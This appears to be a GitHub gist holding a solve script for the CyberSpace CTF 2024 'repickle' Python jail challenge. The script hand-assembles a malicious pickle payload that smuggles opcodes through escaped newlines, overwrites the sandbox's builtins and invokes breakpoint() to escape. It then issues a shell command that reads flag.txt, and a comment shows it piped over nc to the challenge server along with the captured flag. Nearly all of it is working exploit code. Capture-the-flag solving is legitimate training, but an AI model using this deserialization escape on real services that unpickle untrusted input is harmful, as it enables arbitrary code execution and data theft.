Skip to content

Instantly share code, notes, and snippets.

@lebr0nli

lebr0nli/solve.py

Last active September 12, 2024 02:28
Show Gist options
  • Save lebr0nli/b82369b27b010731c6cd43f4fdb9f3d7 to your computer and use it in GitHub Desktop.
Save lebr0nli/b82369b27b010731c6cd43f4fdb9f3d7 to your computer and use it in GitHub Desktop.
Download ZIP
CyberSpace CTF 2024 - repickle (jail)
Raw
solve.py
import pickle
smuggled = \
pickle.GLOBAL + b"sandbox\ny\n" + \
pickle.GLOBAL + b"sandbox\n__builtins__\n" + \
pickle.BUILD + \
pickle.GLOBAL + b"sandbox\nbreakpoint\n" + \
pickle.EMPTY_TUPLE + \
pickle.REDUCE
smuggled = smuggled.replace(b"\n", b"\\u000a")
fake_unicode_attr = b"__doc__\\u000a" + smuggled + b"\n"
payload = \
pickle.PROTO + b"\x04" + \
pickle.GLOBAL + b"x\nsandbox\n" + \
pickle.MARK + \
pickle.NONE + \
pickle.EMPTY_DICT + \
pickle.UNICODE + fake_unicode_attr + \
pickle.GLOBAL + b"x\nSandboxClass\n" + \
pickle.SETITEM + \
pickle.UNICODE + b"y\n" + \
pickle.GLOBAL + b"x\nsandbox\n" + \
pickle.SETITEM + \
pickle.TUPLE + \
pickle.BUILD + \
pickle.POP + \
pickle.MARK + \
pickle.GLOBAL + b"x\nSandboxClass\n" + \
pickle.MARK + \
pickle.NONE + \
pickle.EMPTY_DICT + \
pickle.UNICODE + b"__qualname__\n" + \
pickle.UNICODE + fake_unicode_attr + \
pickle.SETITEM + \
pickle.TUPLE + \
pickle.BUILD + \
pickle.EMPTY_TUPLE + \
pickle.REDUCE + \
pickle.BININT1 + b"\x02" + \
pickle.TUPLE + \
pickle.STOP
assert len(payload) < 318, f"Payload too long: {len(payload)}"
print(payload.hex())
print("import os;os.system('cat flag.txt')")
# $ python3 solve.py | nc repickle.challs.csc.tf 1337
# CSCTF{repickle_601c2ab4c856c}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment